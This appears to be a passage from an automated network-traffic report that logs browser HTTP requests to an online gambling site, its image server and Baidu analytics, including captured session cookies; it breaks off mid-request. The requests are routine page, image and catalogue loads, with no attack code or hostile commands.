Source: global trafficHTTP traffic detected: GET /hm.js?947ea0365dd8ab01fc51bd9439b42930 HTTP/1.1Host: hm.baidu.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: HMACCOUNT_BFESS=E4D1CF12C6FA10DD
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/upg/UPG_TreasureBowls.png?ver=1728355170 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/upg/UPG_FaFaFortune.png?ver=1728355170 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /member/call-request?check=1 HTTP/1.1Host: b45032.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: Hm_lvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; HMACCOUNT=E4D1CF12C6FA10DD; XSRF-TOKEN=eyJpdiI6IjF1cGRRc2JFTkR2RHpZbUlKbzBlUVE9PSIsInZhbHVlIjoiM1p3NHhoYjZWOExTc3U0ZXFrNnlhZ1pZVmhwMFpKa25oc0VYaDRndFh2ZERZRHNSYWVjM3BoKzY3bWthOXV0WU96a1A5K2NMU2d4ZCtPbmVjTlpJSUE9PSIsIm1hYyI6ImMwNTAzZjhhN2YzNTA0ZGIwZWVlOWQ2ZDVhZGYyY2JiODNmOWQ2MjE3M2ZlMzMwNDI4MDU4MzIzYjhmODY1MmIifQ%3D%3D; Hm_lpvt_947ea0365dd8ab01fc51bd9439b42930=1736725708; vanguard_session=eyJpdiI6IjNRWFhcLzlKWDQ4dk00K2k5bVVrM3hnPT0iLCJ2YWx1ZSI6IjJsa2YrcUN3N253YVZva3U2cFlpZlZaYlNUd1wvcU5zblkxdGJ6Qjk3TFVvWXdUdjV1Tkx2dHp6ZHQ5Z0tkc215OEUwWUhSTjZVaFVTaHBMR3BzUksxZz09IiwibWFjIjoiZTc4ZWZhMjY0NDViYWE3YzQ5NjBkYjg3NWEwZTI3MzZjYWM3NmNhMjkzNDkyMjg1N2IwMDgyNmUyMWFlYTcwYyJ9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/upg/UPG_miningFever.png?ver=1712128601 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/upg/UPG_majesticDragons.png?ver=1712128601 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/upg/UPG_wonderWoods.png?ver=1712128601 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/upg/UPG_treasureSkyland.png?ver=1712128601 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/upg/UPG_stumpyMcDoodles.png?ver=1712128601 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/upg/UPG_tikiMania.png?ver=1712128601 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/upg/UPG_seven7s.png?ver=1712128601 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/upg/UPG_treasureHeroes.png?ver=1712128601 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /hm.gif?hca=E4D1CF12C6FA10DD&cc=1&ck=1&cl=24-bit&ds=1280x1024&vl=907&et=0&ja=0&ln=en-us&lo=0&lt=1736725677&rnd=1903090938&si=947ea0365dd8ab01fc51bd9439b42930&v=1.3.2&lv=2&sn=48208&r=0&ww=1280&u=https%3A%2F%2Fb45032.com%2Fegame%2F224&tt=bet365%E8%8B%B1%E5%9B%BD%E4%B8%8A%E5%B8%82%E5%AE%98%E7%BD%91 HTTP/1.1Host: hm.baidu.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: HMACCOUNT_BFESS=E4D1CF12C6FA10DD
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/upg/UPG_risingRoyals.png?ver=1712128601 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/upg/UPG_northStorm.png?ver=1712128601 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/upg/UPG_miningFever.png?ver=1712128601 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/upg/UPG_majesticDragons.png?ver=1712128601 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /egame/202 HTTP/1.1Host: b45032.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: Hm_lvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; HMACCOUNT=E4D1CF12C6FA10DD; XSRF-TOKEN=eyJpdiI6IjF1cGRRc2JFTkR2RHpZbUlKbzBlUVE9PSIsInZhbHVlIjoiM1p3NHhoYjZWOExTc3U0ZXFrNnlhZ1pZVmhwMFpKa25oc0VYaDRndFh2ZERZRHNSYWVjM3BoKzY3bWthOXV0WU96a1A5K2NMU2d4ZCtPbmVjTlpJSUE9PSIsIm1hYyI6ImMwNTAzZjhhN2YzNTA0ZGIwZWVlOWQ2ZDVhZGYyY2JiODNmOWQ2MjE3M2ZlMzMwNDI4MDU4MzIzYjhmODY1MmIifQ%3D%3D; Hm_lpvt_947ea0365dd8ab01fc51bd9439b42930=1736725708; vanguard_session=eyJpdiI6IkdxYUdyRGViXC9tWUFJU2hIa3JJNDRRPT0iLCJ2YWx1ZSI6IlZZaXdoVzlRVnh4UE1PbVNKenpld28yWjErdEZ2QTQrUW9FVjdYdHFIVlJ2aDZcL3NPOEdPalRTSUY3NFlsdDRnMTVMelE3eVVhd0RWUXRQQThHamxhUT09IiwibWFjIjoiNDlmZWI0NWZjZjA5NTYwNjZkMDMxYzUzMTQ0YjA4OTVmMThkNTIyOTUwMzg2NTBmMmY5MjZhZDRkMzEyZjU0YyJ9
Source: global trafficHTTP traffic detected: GET /getcatlist/202 HTTP/1.1Host: b45032.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://b45032.com/egame/202Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: Hm_lvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; HMACCOUNT=E4D1CF12C6FA10DD; Hm_lpvt_947ea0365dd8ab01fc51bd9439b42930=1736725708; XSRF-TOKEN=eyJpdiI6IlkxcjZNSWtlZUpEenVGd1dkQWM2aGc9PSIsInZhbHVlIjoid2x5Q1l5S3dseXV6Wno4QXlqeGZtSHFsRGJtc0twOGtFeG5zbkN3N1dtdG1ybmZDelE5dEZONWRRdGU4U1pBWjNxYytkZnN0V2pLSXExNmpZZjR2V1E9PSIsIm1hYyI6ImRjOGRiZTFmYjIzN2MxYWI0NDJiODJiMDNkZDFlMTA1NDE5NGIwYTY4OGVjYTA1ZjI1MzRmNjBiNTM1OGVhMmEifQ%3D%3D; vanguard_session=eyJpdiI6IlZUY2d0M0p5OFN5ZEgyYUcxaVJNS1E9PSIsInZhbHVlIjoiUnJTREZ4bWVrSlwvNEtYZXdGZ1A3K0ZVemZvTUxuTGJzdGdKU0pRQW1PeTg5WnFkdUxKS0xDek9BTEJkTkM0QStMNFFvcTVadGphYWdUT2daaXJsWnlBPT0iLCJtYWMiOiIzMTZlMjdkNTk2ZjE3ZGQwMGYyYjYwZWYwMmExYzI4ZmZmOGYxN2U3NWQ5NDg0NDYyOTQ1MDQ5MGMwNDYyZmRiIn0%3D
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/rich88/BaccaratLZ.png?ver=1696302818 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/en/202_egame_icon.png?1736725718963 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://b45032.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /getegame?platform%5B%5D=202&page=1&gamename=&gameid= HTTP/1.1Host: b45032.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://b45032.com/egame/202Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: Hm_lvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; HMACCOUNT=E4D1CF12C6FA10DD; Hm_lpvt_947ea0365dd8ab01fc51bd9439b42930=1736725708; XSRF-TOKEN=eyJpdiI6IlkxcjZNSWtlZUpEenVGd1dkQWM2aGc9PSIsInZhbHVlIjoid2x5Q1l5S3dseXV6Wno4QXlqeGZtSHFsRGJtc0twOGtFeG5zbkN3N1dtdG1ybmZDelE5dEZONWRRdGU4U1pBWjNxYytkZnN0V2pLSXExNmpZZjR2V1E9PSIsIm1hYyI6ImRjOGRiZTFmYjIzN2MxYWI0NDJiODJiMDNkZDFlMTA1NDE5NGIwYTY4OGVjYTA1ZjI1MzRmNjBiNTM1OGVhMmEifQ%3D%3D; vanguard_session=eyJpdiI6IlZUY2d0M0p5OFN5ZEgyYUcxaVJNS1E9PSIsInZhbHVlIjoiUnJTREZ4bWVrSlwvNEtYZXdGZ1A3K0ZVemZvTUxuTGJzdGdKU0pRQW1PeTg5WnFkdUxKS0xDek9BTEJkTkM0QStMNFFvcTVadGphYWdUT2daaXJsWnlBPT0iLCJtYWMiOiIzMTZlMjdkNTk2ZjE3ZGQwMGYyYjYwZWYwMmExYzI4ZmZmOGYxN2U3NWQ5NDg0NDYyOTQ1MDQ5MGMwNDYyZmRiIn0%3D
Source: global trafficHTTP traffic detected: GET /csrf HTTP/1.1Host: b45032.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://b45032.com/egame/202Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: Hm_lvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; HMACCOUNT=E4D1CF12C6FA10DD; Hm_lpvt_947ea0365dd8ab01fc51bd9439b42930=1736725708; XSRF-TOKEN=eyJpdiI6IlkxcjZNSWtlZUpEenVGd1dkQWM2aGc9PSIsInZhbHVlIjoid2x5Q1l5S3dseXV6Wno4QXlqeGZtSHFsRGJtc0twOGtFeG5zbkN3N1dtdG1ybmZDelE5dEZONWRRdGU4U1pBWjNxYytkZnN0V2pLSXExNmpZZjR2V1E9PSIsIm1hYyI6ImRjOGRiZTFmYjIzN2MxYWI0NDJiODJiMDNkZDFlMTA1NDE5NGIwYTY4OGVjYTA1ZjI1MzRmNjBiNTM1OGVhMmEifQ%3D%3D; vanguard_session=eyJpdiI6IlZUY2d0M0p5OFN5ZEgyYUcxaVJNS1E9PSIsInZhbHVlIjoiUnJTREZ4bWVrSlwvNEtYZXdGZ1A3K0ZVemZvTUxuTGJzdGdKU0pRQW1PeTg5WnFkdUxKS0xDek9BTEJkTkM0QStMNFFvcTVadGphYWdUT2daaXJsWnlBPT0iLCJtYWMiOiIzMTZlMjdkNTk2ZjE3ZGQwMGYyYjYwZWYwMmExYzI4ZmZmOGYxN2U3NWQ5NDg0NDYyOTQ1MDQ5MGMwNDYyZmRiIn0%3D
Source: global trafficHTTP traffic detected: GET /gdcode_1736725716 HTTP/1.1Host: b45032.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/egame/202Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: Hm_lvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; HMACCOUNT=E4D1CF12C6FA10DD; Hm_lpvt_947ea0365dd8ab01fc51bd9439b42930=1736725708; XSRF-TOKEN=eyJpdiI6IlkxcjZNSWtlZUpEenVGd1dkQWM2aGc9PSIsInZhbHVlIjoid2x5Q1l5S3dseXV6Wno4QXlqeGZtSHFsRGJtc0twOGtFeG5zbkN3N1dtdG1ybmZDelE5dEZONWRRdGU4U1pBWjNxYytkZnN0V2pLSXExNmpZZjR2V1E9PSIsIm1hYyI6ImRjOGRiZTFmYjIzN2MxYWI0NDJiODJiMDNkZDFlMTA1NDE5NGIwYTY4OGVjYTA1ZjI1MzRmNjBiNTM1OGVhMmEifQ%3D%3D; vanguard_session=eyJpdiI6IlZUY2d0M0p5OFN5ZEgyYUcxaVJNS1E9PSIsInZhbHVlIjoiUnJTREZ4bWVrSlwvNEtYZXdGZ1A3K0ZVemZvTUxuTGJzdGdKU0pRQW1PeTg5WnFkdUxKS0xDek9BTEJkTkM0QStMNFFvcTVadGphYWdUT2daaXJsWnlBPT0iLCJtYWMiOiIzMTZlMjdkNTk2ZjE3ZGQwMGYyYjYwZWYwMmExYzI4ZmZmOGYxN2U3NWQ5NDg0NDYyOTQ1MDQ5MGMwNDYyZmRiIn0%3D
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/mg/SMG_sharkPlatinum.png?ver=1720576306 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /getegame?platform%5B%5D=202&page=1&cates%5B%5D=801&gamename=&gameid= HTTP/1.1Host: b45032.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://b45032.com/egame/202Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: Hm_lvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; HMACCOUNT=E4D1CF12C6FA10DD; Hm_lpvt_947ea0365dd8ab01fc51bd9439b42930=1736725708; XSRF-TOKEN=eyJpdiI6IktsTVB6dVQrQ3QrUVVxRUpTWUNzcUE9PSIsInZhbHVlIjoiSkpMbUpKT2ZySnZqcGdxWnF2QnFCbTZveGNuUHoxQ2dWdktzZEI3T0lEb3JyTXVHV1NEWkVMQ1dYOFdDNEU5dW5mWXBqWUN0TUV1UGdZeGtkcWxyb1E9PSIsIm1hYyI6IjRmYWFjNGJkMGQ3YWU2MGE3MGMzM2NkYzQ1ZTA3YjUzYTNjOGI0NTkwNzBkY2U1ZmU4NmRiZDI4OTc4NmIzMGQifQ%3D%3D; vanguard_session=eyJpdiI6Ilh0bnU0dDBlSGpvbW0wSUdhaDJSY0E9PSIsInZhbHVlIjoidnJ0bUgzRHE1UUkyUmxuTGhyYWJKa2F5QmxGWGRISUFuUnJKWFlHMmxZd0RQRFRhZ0pZNHFHbEpVYnlhODhMUXpaK2R1NjkyY2lHRGU1ZzFMTEtnZXc9PSIsIm1hYyI6IjkzYzdjOWYzMmZkNjYwOTgwNDM1ZTg2YWQ3MzVhMWIzMmQ0NjE5MmIzN2U1NjYwNzhmZmU3ZTU3ZGRlZTA2NTMifQ%3D%3D
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/gamekey/1.png?ver=1659683709 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/rich88/BaccaratLZ.png?ver=1696302818 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /getcatlist/202 HTTP/1.1Host: b45032.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: Hm_lvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; HMACCOUNT=E4D1CF12C6FA10DD; Hm_lpvt_947ea0365dd8ab01fc51bd9439b42930=1736725708; XSRF-TOKEN=eyJpdiI6IkszTVZIWUtvZlNxMXg5NldcL25oVnd3PT0iLCJ2YWx1ZSI6IjZMMGpFWWVVNExrbVhyd0F4Z2swUjRFNlJ4cVMwanA4R253ZTlmY0RXY0pNbFhhdXhoK1JCWmljWURyQ0RUV1NMV3E5U1wvbXpERUxCTENWOEpTUGV2Zz09IiwibWFjIjoiNzY3OTIyZTExZDAwMmY3YmU0MTU5NTI2YjYyOWI5NDgwYzEzNzcyZjRhMDU0OGFjMGI0ZTAzNGNhZjNjZDRjNCJ9; vanguard_session=eyJpdiI6InQ0cFpmODU5YzdGRHFEOFdrN3ZYcHc9PSIsInZhbHVlIjoiWEw3YlFST2lQMGRvd1lrYU9YTjlFd3JTREhBOUhxNHVUXC9KdktHNVZKWkhkNCtKNEROdGdsRTFDUzY0YzhCbGR2NHZYZlNGU1AzbU45blBIeW5GYm1RPT0iLCJtYWMiOiJhOGZhMTBhNmYyMGM1MTZmYWUwNmVmYmJhNzBhMWJkYmEyMGZhNDRlZTk0YTQ4MDYxNDg0NzBhZTI1ZjkyZjhhIn0%3D
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/mg/SMG_sharkPlatinum.png?ver=1720576306 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /getegame?platform%5B%5D=202&page=1&gamename=&gameid= HTTP/1.1Host: b45032.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: Hm_lvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; HMACCOUNT=E4D1CF12C6FA10DD; Hm_lpvt_947ea0365dd8ab01fc51bd9439b42930=1736725708; 